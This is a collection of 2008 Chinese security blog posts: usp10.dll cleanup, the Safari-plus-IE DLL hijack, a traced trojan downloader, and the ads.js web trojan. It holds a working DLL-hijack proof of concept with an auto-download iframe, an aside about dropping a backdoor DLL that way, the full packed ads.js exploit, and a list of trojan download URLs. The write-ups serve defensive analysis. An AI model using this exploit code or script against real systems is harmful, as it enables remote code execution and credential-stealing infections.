挂彩usp10.dll垃圾 不完全清理办法

系统中有个usp10.dll(WINDOWS\system32\USP10.dll),发现在其他目录下的usp10.dll就可以确定程序”.exe”文件被感染啦。

由于偶先前做过备份,就直接恢复系统,然后通过安装在系统盘下的360进行啦查杀!100多号文件夹下都有这东东,直接强力查杀即可ok。

若是没有备份系统,又想清理usp10.dll,可尝试打开”我的电脑”选择菜单栏里的”工具”下的”文件夹选项”选择”隐藏受保护的操作系统文件”和”显示所有文件和文件夹”,这样做是因为这个USP10.dll病毒把自身修改为系统文件和隐藏文件,这样做后就可以看到USP10.dll病毒文件了.USP10.dll病毒会感染系统里所有exe文件,并切把自身复制到被感染的exe文件的当前目录。到安全模式去删除病毒,在安全模式下,”开始菜单”选择”搜索”再选择”文件或文件夹”在”全部或部分文件名”里写上”usp10.dll”,然后直接点”搜索”,系统会搜索出所有盘符下的USP10.dll病毒出来,注意路径,C:\WINDOWS\system32\USP10.dll和C:\WINDOWS\system32\dllcache\USP10.dll的不是病毒,其他的都是,等把所有usp10.dll搜索出来后,就删除,C:\WINDOWS\USP10.dll可能一时删不了,这个也是病毒,只是还有进程在使用他,我们可以先给他改个名字,重命名一下,只要不是usp10.dll就可以,然后重新启动,再回到C:\WINDOWS\把你刚改的名字的病毒删掉就可以了.但是被感染的exe还没有恢复,这样没有完全把的病毒全面清理掉,还是要依靠专杀工具或杀毒软件来修复exe文件。囧

上边这个搜索删除办法参考自:http://iask.sina.com.cn/b/13260913.html?from=zzsy03

Safari for windows默认配置+ie浏览器——>木马作者的天堂

Nitesh Dhanjani 发现的这个(windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面)漏洞。标题为”Safari Carpet Bomb”的介绍可以在Nitesh Dhanjani博客看到,接着微软就发出一份(标题为:Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform)“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个(MS)漏洞早在2006年就已经报告过。

关于这个混合Safari和IE漏洞攻击的分析

这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述”Internet Explorer 7 – Still Spyware Writers Heaven“,和”IE7 DLL-load hijacking Code Execution Exploit PoC” 漏洞演示代码可以在”milw0rm”找到。

这个漏洞主要出在:ie(Windows Internet Explorer)优先从“用户桌面”加载动态链接库文件(dll),而不是从程序目录(一般是:C:\WINDOWS\SYSTEM32)。

windows版的safari浏览器在没有得到确认的情况下自动下载文件到用户桌面是这次引发windows用户遭受攻击的前因。当动态链接库文件(DLL文件)为特定的名称时打开ie将从这里(用户桌面)加载这些动态链接库文件。两件事情混合起来就是:IE加载运行safari自动下载到用户桌面的动态链接库文件,最终导致用户遭受恶意攻击。

作为演示下边为LIUDIEYU写的演示代码(ie加载后调用记事本打开一个不存在的文件)

另外Aviv Raff也写过个演示代码可以在”milw0rm”找到。

(PS:其实你可以写个木马后门dll扔出去让他运行!!)

/*
        Copyright (C) 2006-2007 Aviv Raff
        http://aviv.raffon.net
        Greetz: hdm, L.M.H, str0ke, SkyLined

        Compile and upload to the victim's desktop as one of the following hidden DLL files:
        - sqmapi.dll
        - imageres.dll
        - schannel.dll

        Run IE7 and watch the nice calculators pop up.
        Filter fdwReason to execute only once.

        Tested on WinXP SP2 with fully patched IE7.
        For testing/educational purpose only!

*/

#include <windows.h>

BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR windir[_MAX_PATH];
    TCHAR cmd[ _MAX_PATH ];
    GetEnvironmentVariable("WINDIR",windir,_MAX_PATH );
    wsprintf(cmd,"%s\\system32\\calc.exe",windir);
    ZeroMemory(&si,sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(π,sizeof(pi));
    CreateProcess(NULL,cmd,NULL,NULL,FALSE,0,NULL,NULL,&si,π);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return TRUE;
}

// milw0rm.com [2006-12-14]

———-dll.c———-
#include <windows.h>

BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;

ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(π,sizeof(pi));

CreateProcess(NULL,”NOTEPAD \”=====(((((we are in)))))=====\””,NULL,NULL,FALSE,0,NULL,NULL,&si,π);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}

你可以编译这个库文件并命名为”schannel.dll”,“sqmapi.dll”或“imageres.dll”就可以利用啦。

———-index.html———-
<html><head>
<title>Test safari downloads automatically</title>
</head><body>
只要使用Safari打开这个页面,同时schannel.dll将自动下载到用户桌面<br>
<iframe src=”schannel.dll” width=1 height=1></iframe><br>

打开ie,将会看到效果(ie远程调用记事本打开一个不存在的文件)

<i>这就是结果.</i><br>
<br>
这个测试只能使用一次<br>
</body></html>

PS:个人认为这个组合漏洞攻击应该算是小概率事件,比如使用safari的用户很少情况会切换到ie,还有如果恶意攻击者,把文件显眼的下到用户桌面(对于这么明显的可疑文件很容易被删除的,如果隐藏怎么办呢?!)。不论怎样这是个潜在的危险(如果下次不是Safari呢?)。

PS2:这是不是也提醒程序员同学们写代码时要考虑自己的库文件搜索路径问题了,当前目录最多的情况应该是桌面啦,当然这涉及到windows内核(..)的问题(加载动态链接库的时候搜索路径的顺序——当前目录,程序目录,系统目录,谁先谁后?)

相关地址:

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://www.microsoft.com/technet/security/advisory/953818.mspx

http://liudieyu0.blog124.fc2.com/blog-entry-1.html

http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html

http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx

http://aviv.raffon.net/2006/12/14/IE7DLLloadHijackingCodeExecutionExploitPoC.aspx

http://aviv.raffon.net/2006/11/01/InternetExplorer7StillSpywareWritersHeaven.aspx

http://milw0rm.org/exploits/2929

演示地址:http://liudieyu.com/iesafari200806.2885391780966027/

explorer.exe下载者病毒行为跟踪

得到样本,打开虚拟机,先到http://www.virustotal.com/分析一下情况:

文件 explorer.exe 接收于 2008.05.29 16:26:52 (CET)
反病毒引擎 版本 最后更新 扫描结果</td
AhnLab-V3 2008.5.29.0 2008.05.29 -</td
AntiVir 7.8.0.19 2008.05.29 TR/Downloader.Gen</td
Authentium 5.1.0.4 2008.05.28 W32/Agent.L.gen!Eldorado</td
Avast 4.8.1195.0 2008.05.29 Win32:Agent-XEY</td
AVG 7.5.0.516 2008.05.29 KillAV.JR</td
BitDefender 7.2 2008.05.29 Generic.Malware.Bdld.2B3CEAD5</td
CAT-QuickHeal 9.50 2008.05.28 TrojanDownloader.Zlob.ww</td
ClamAV 0.92.1 2008.05.29 PUA.Packed.UPack-2</td
DrWeb 4.44.0.09170 2008.05.29 DLOADER.Trojan</td
eSafe 7.0.15.0 2008.05.29 Suspicious File</td
eTrust-Vet 31.4.5832 2008.05.29 Win32/Vraja.A</td
Ewido 4.0 2008.05.29 -</td
F-Prot 4.4.4.56 2008.05.28 W32/Agent.L.gen!Eldorado</td
F-Secure 6.70.13260.0 2008.05.29 W32/Suspicious_U.gen</td
Fortinet 3.14.0.0 2008.05.29 -</td
GData 2.0.7306.1023 2008.05.29 Trojan.Win32.Agent.ksq</td
Ikarus T3.1.1.26.0 2008.05.29 Trojan-Downloader.Win32.Zlob.and</td
Kaspersky 7.0.0.125 2008.05.29 Trojan.Win32.Agent.ksq</td
McAfee 5305 2008.05.28 New Malware.aj</td
Microsoft None 2008.05.29 -</td
NOD32v2 3144 2008.05.29 -</td
Norman 5.80.02 2008.05.28 W32/Smalldrp.VJT</td
Panda 9.0.0.4 2008.05.28 Suspicious file</td
Prevx1 V2 2008.05.29 -</td
Rising 20.46.32.00 2008.05.29 Trojan.DL.Win32.Undef.mz</td
Sophos 4.29.0 2008.05.29 Mal/Heuri-E</td
Sunbelt 3.0.1123.1 2008.05.17 VIPRE.Suspicious</td
Symantec 10 2008.05.29 -</td
TheHacker 6.2.92.322 2008.05.28 W32/Behav-Heuristic-060</td
VBA32 3.12.6.6 2008.05.29 Trojan.Win32.Agent.ksq</td
VirusBuster 4.3.26:9 2008.05.28 Packed/Upack</td
Webwasher-Gateway 6.6.2 2008.05.29 Trojan.Downloader.Gen</td
附加信息
File size: 10920 bytes
MD5…: adf37694614161a5c513069f6a4353a0
SHA1..: d8c88000dbbd4d09487afa8e82a0af1be35e6fba
SHA256: f798ccb117c4751b52b3745020a3856a204e6e44d3af6e04606cbdcc21cd5d18
SHA512: 945496614f4d3a408aaf5950e952b49424866c948fa088b2f6a427b1d0467ad3
c1ed82c73f500cdf7f53c7870ed8a34c70042c96f4f8595b60c9014dd3a87cc2
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x401018
timedatestamp…..: 0x4011b0be (Fri Jan 23 23:39:42 2004)
machinetype…….: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
PS 0x1000 0x15000 0x1f0 5.16 a035efb8d8b8853a55e11efef94607b6
@A 0x16000 0xa000 0x28a8 7.98 2904fb87f598070c35d60ee3179aaebb
RA@ 0x20000 0x1000 0x1f0 5.16 a035efb8d8b8853a55e11efef94607b6

( 0 imports )

( 0 exports )

packers (Authentium): UPack
packers (Kaspersky): PE_Patch, UPack
packers (F-Prot): UPack

分析报告只是为我们进一步分析提供个参照或者说心理准备!
下面开始追踪这个“下载者引擎”(各大杀毒厂商对这个explorer.exe的定义各有不同,个人认为叫做下载者和病毒引擎比较合适)的行为。

工具:
Tiny Personal Firewall 2005(跟踪程序各种行为)

WSockExpert.exe(对网络请求进行抓包)

。。
首先安装Tiny Personal Firewall 2005,然后打开WSockExpert.exe并设置为trust(信任程序,免得把他的行为扑捉到),然后执行你的病毒样本,一步步的按照提示进行分析,因为要了解这个程序的行为所以可以选择”run with default security”,看到allow最好选择allow(ps:如果你已经了解这个程序的行为,可以根据自己需要进行allow和deny),总的来说这个explorer.exe运行后,先启动两个cmd.exe程序然后扫描局域网的主机,找机会传播病毒体,扫一定数量主机或者cmd.exe没有正常执行的话就开始连接http://sds.687230xsds.cn/pao.txt获取木马列表(PS:很恐怖,一串的游戏盗号木马),然后使用cmd和conime.exe进行游戏盗号木马的下载活动,每下载一个就会运行然后删除,下载的目录是system32下(多以数字命名),由于后边下载的活动都很雷同,我就直接deny掉cmd.exe和conime.exe的行为,这样就挨个下载完那些游戏木马了(为啦省事后边的游戏木马也是deny的)。如果想更深入详细的了解这个东东都做啦什么以及为什么这么做,就去看反汇编吧。可以到看雪那里找找工具。pediy

总结:
1:这个explorer.exe的老窝(explorer.exe会到http://sds.687230xsds.cn/pao.txt寻找游戏盗号木马列表)是sds.687230xsds.cn现在对应的ip是218.61.17.135
2:游戏盗号木马的地址是ts.6323fds.cn现在对应的ip是218.61.17.135(PS:游戏盗号木马列表会在截图后面补充)

解决建议:
1:如果你是局域网的,可以直接在路由器里过滤这个ip就可以“暂时”解决这个困扰啦。
2:这个木马貌似伴随着flash.exe的漏洞来的(现在还不确定怎么传播的),所以建议及时用上Adobe Flash Player 9.0.124。
FLASH插件更新地址:http://www.adobe.com/shockwave/download/flash/trigger/en/1/index.html
利用flash控件漏洞的实例展示,见:http://bbs.duba.net/thread-21930883-1-1.html
也可以禁用这个插件。 IE浏览器中禁用flash插件的方法:internet选项——>程序——>管理加载项——找到“shockwave flash object”——设置禁用即可(可以参考插图)。
firefox浏览器可以用adblock plus插件将swf文件全部拦截
3:给系统打上全补丁
4:使用360顽固木马大全先杀下,然后用360更新过病毒库后查杀,一般就干净啦
5:值得庆幸的是这个还不会感染exe类可执行文件,不过还原系统后还是最好全盘查下之毒

行为分析:
感染现象,并不是说explorer.exe有这么大能耐,只是中山他后,将会有一堆光顾你的电脑。在会局域网中不停扫描主机,下载游戏盗号木马(是循环的呢,下完一圈还会再来一圈!),连带第三代机器狗病毒木马攻破还原系统(重启后不会被还原没有),arp攻击,dns欺骗。
下边是追踪过程中的截图(有些是后来补上的!!)

http://sds.687230xsds.cn/pao.txt

2008-5-27=http://ts.6323fds.cn/wow.exe
2008-5-27=http://ts.6323fds.cn/mh.exe
2008-5-27=http://ts.6323fds.cn/jh.exe
2008-5-27=http://ts.6323fds.cn/qst.exe
2008-5-27=http://ts.6323fds.cn/qj.exe
2008-5-27=http://ts.6323fds.cn/my.exe
2008-5-27=http://ts.6323fds.cn/zx.exe
2008-5-27=http://ts.6323fds.cn/wd.exe
2008-5-27=http://ts.6323fds.cn/wl.exe
2008-5-27=http://ts.6323fds.cn/dh.exe
2008-5-27=http://ts.6323fds.cn/dh3.exe
2008-5-27=http://ts.6323fds.cn/dj.exe
2008-5-27=http://ts.6323fds.cn/tl.exe
2008-5-27=http://ts.6323fds.cn/zt.exe
2008-5-27=http://ts.6323fds.cn/hx.exe
2008-5-27=http://ts.6323fds.cn/qqhx.exe
2008-5-27=http://ts.6323fds.cn/qqhux.exe
2008-5-27=http://ts.6323fds.cn/zyhx.exe
2008-5-27=http://ts.6323fds.cn/mir.exe
2008-5-27=http://ts.6323fds.cn/mir2.exe
2008-5-27=http://ts.6323fds.cn/fh.exe
2008-5-27=http://ts.6323fds.cn/sq.exe
2008-5-27=http://ts.6323fds.cn/sh.exe
2008-5-27=http://ts.6323fds.cn/wmgj.exe
2008-5-27=http://ts.6323fds.cn/wmsj.exe
2008-5-27=http://ts.6323fds.cn/sg.exe
2008-5-27=http://ts.6323fds.cn/fy.exe
2008-5-27=http://ts.6323fds.cn/jz.exe
2008-5-27=http://ts.6323fds.cn/zy.exe
2008-5-27=http://ts.6323fds.cn/cb.exe
2008-5-27=http://ts.6323fds.cn/sq.exe
2008-5-27=http://ts.6323fds.cn/ar.exe
2008-5-27=http://ts.6323fds.cn/yt2.exe
2008-5-27=http://ts.6323fds.cn/jxqy.exe
2008-5-27=http://ts.6323fds.cn/chd.exe
2008-5-27=http://ts.6323fds.cn/mxd.exe
2008-5-27=http://ts.6323fds.cn/pt.exe
2008-5-27=http://ts.6323fds.cn/jtdd.exe
2008-5-27=http://ts.6323fds.cn/jr.exe
2008-5-27=http://ts.6323fds.cn/wl2.exe
2008-5-27=http://ts.6323fds.cn/qn3.exe
2008-5-27=http://ts.6323fds.cn/fs2.exe
2008-5-27=http://ts.6323fds.cn/tm1.exe
2008-5-27=http://ts.6323fds.cn/tm2.exe
2008-5-27=http://ts.6323fds.cn/tm3.exe
2008-5-27=http://ts.6323fds.cn/tm4.exe
2008-5-27=http://ts.6323fds.cn/tm5.exe
2008-5-27=http://ts.6323fds.cn/tm6.exe
2008-5-27=http://ts.6323fds.cn/xw.exe
2008-5-27=http://ts.6323fds.cn/wl2.exe
2008-5-27=http://ts.6323fds.cn/r2.exe

最新消息:
Adobe最近发布的Flash Player .0.124 0.0版本也发现新的漏洞,该漏洞同样会引起严重后果。
新闻链接:
http://soft.yesky.com/securityw/aqzxx/359/8140859.shtml
http://www.securityfocus.com/bid/29386

病毒分析技术课程PDF版本

F-Secure推出的病毒分析课程并提供了PDF版本教材下载,对病毒分析技术感兴趣的朋友可以看看!e文,课程下载地址:http://www.tml.tkk.fi/Opinnot/T-110.6220/2008/

Course information

The course teaches students what malicious code is and how it can be detected and analyzed. Topics of the course include malware taxonomy, reverse engineering, code emulation fundamentals, basic cryptoanalysis of malicious crypto, and antivirus engine basics. Course includes a homework project that requires programming skills.

(e2z)

From:F-Secure 官方博客http://www.f-secure.com/weblog/

ads.js新变种(err.www404.cn:53/ads.js)?又是百度

这个地址是在telnet百度的时候发现的:

<script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script>

把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。

ads.js源码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]”;h{2 e;2 w=(4[“P”+”U”](“x”));w[“X”](“W”,v);f[“E”][“D”](“C”+”F.”+”S”+”M”+”e”+”K”,””)}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f[“l”](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f[“l”](“1g”+”16.17″+”15.1”);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f[“l”](“12″+”13.I”+”18.1”);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{}))

ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么):

function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function exit(){var Cikeid1=”clsid:BD9″+”6C556″+”-65A3-11D”;var Cikeid2=”0-983A”+”-00C04FC29E36″;var Cikeid=Cikeid1+Cikeid2;var errinfo=”[object Error]”;try{var e;var afilesto=(document[“creat”+”eElement”](“object”));afilesto[“setAttribute”](“classid”,Cikeid);window[“ado”][“createobject”](“Ad”+”odb.”+”S”+”tr”+”e”+”am”,””)}catch(e){};finally{var hoodt=new Date();hoodt.setTime(hoodt.getTime()+86400000);document.cookie=’MyCookie=lonely;path=/;hoodt=’+hoodt.toGMTString();document.write(“”);document.write(” “);if(e!=errinfo){}else{try{var cikewm=new window[“ActiveXObject”](“MPS.StormPlayer”);var sto}catch(sto){};finally{if(sto!=errinfo){document.write(” “);

这里的clsid为:clsid:BD96C556-65A3-11D0-983A-00C04FC29E36可以知道是利用的ms06014漏洞来挂的。

最下边还有stormPlayer是利用暴风影音漏洞来的。

临时解决办法(比如不让卡吧弹出提示什么的,因为怎么杀也杀不完,是别人机子中毒啦,DnsArp影响到你):

保存下面为a.bat然后双击运行就可以啦

echo 127.0.0.1       u.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       g.asdafdgfgf.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       u.asdafdgfgf.com/ads.js  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1        222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       k.222360.com/ads/ads.cab  >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1       err.www404.cn:53/ads.js >>C:\WINDOWS\system32\drivers\etc\hosts

或者直接把这个222.216.28.25在路由器中过滤掉(ps:如果他是个人的adsl就过滤掉他一个网段吧),为啦不影响使用我过滤的他单个ip,还有开启360恶意网页拦截也能达到保护的效果。

u.asdafdgfgf.com不完全查杀记录『Fax 2Client为你带来的礼物』

好不容易抓到个中奖的机子(其他机子都打补丁啦,就有两个没打过补丁!!后来挪进来的机子)

360安全卫士木马查杀历史报告

木马名称:恶意干扰对象
路径:C:\WINDOWS\DOWNLO~1\405.exe
查杀时间 :2008-04-21 20:17
木马名称:伪Honey木马下载器
路径:C:\PROGRA~1\COMMON~1\CPUSH\cpush.dll
查杀时间 :2008-04-21 20:17
木马名称:Weiyuan木马程序
路径:C:\windows\system32\weiyuan.exe
查杀时间 :2008-04-21 20:17
木马名称:PWL.LMir木马程序
路径:C:\WINDOWS\system32\inf\svch0st.exe
查杀时间 :2008-04-21 20:17
木马名称:伪linkinfo恶意程序
路径:C:\WINDOWS\linkinfo.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sua
路径:C:\Program Files\Common Files\CPUSH\Uninst.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\桌面\Microsoft.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\m[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\dat[1].asp
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\4B6LWHOV\1[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\Documents and Settings\Admin\Local Settings\Temp\wip.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aha
路径:C:\Documents and Settings\Admin\Local Settings\Temp\223.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\6D2RAZC7\ThunderBHONew32[1].dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\an006[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\KX4NIVW9\d39[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\cec61.txt
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\cce1.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.AutoRV.aaf
路径:C:\WINDOWS\an006.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lag
路径:C:\WINDOWS\d39.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Small.hlp[Downloader]
路径:C:\WINDOWS\AppPatch\AcSpecf.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\WINDOWS\AppPatch\AcPlugin.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system\zayjhxpRes080419.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\WINDOWS\system32\catclogd.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.HZJ.aba
路径:C:\WINDOWS\system32\dyylns80.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.lae
路径:C:\WINDOWS\system32\wicheck080411.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\inf\mscomfix.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\inf\scrsyszy080419.scr
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\WINDOWS\system32\1.ext
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.FtpSend.a[SPY]
路径:C:\WINDOWS\system32\drivers\eth8023.sys
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sac
路径:C:\WINDOWS\system32\05801.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.SuperKiller.sab
路径:c:\WINDOWS\inf\dev01.inf
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oac
路径:C:\WINDOWS\system32\wicheck080411.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.oah
路径:C:\WINDOWS\system32\4051.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\WINDOWS\ThunderBHONew32.dll
查杀时间 :2008-04-21 20:17

很好很全啊,查看过ie记录只有u.asdafdgfgf.com/web/index.htm最可疑,

很猖獗啊,下的木马病毒都还在桌面上放着!

其中一个vb脚本(Chenzi.vbs):

Set Shell = CreateObject(”Wscript.Shell”)
Shell.Run (”Chenzi.exe”)
Set Shell = Nothing

这个是查杀记录,木马很全啊,机器狗哈哈,他还不知道他的狗在这个机子上不管用呢

只是发现这个机子有问题就去看看的,估计是被dns欺骗的时候中招的,那个木马制造者也太猖狂啦竟然把木马赫赫的摆在桌面上!恐怕我不知道机子中呢?脑残?

这个之所以叫做不完全查杀记录是因为我只是看看病毒是怎么进来的,还有病毒都构成哪些危害,并不确定360在机子重启后就把病毒清除干净。

重启后我自然是打开还原打上补丁重新做过备份开启360自我保护加全保护了以防万一嘛。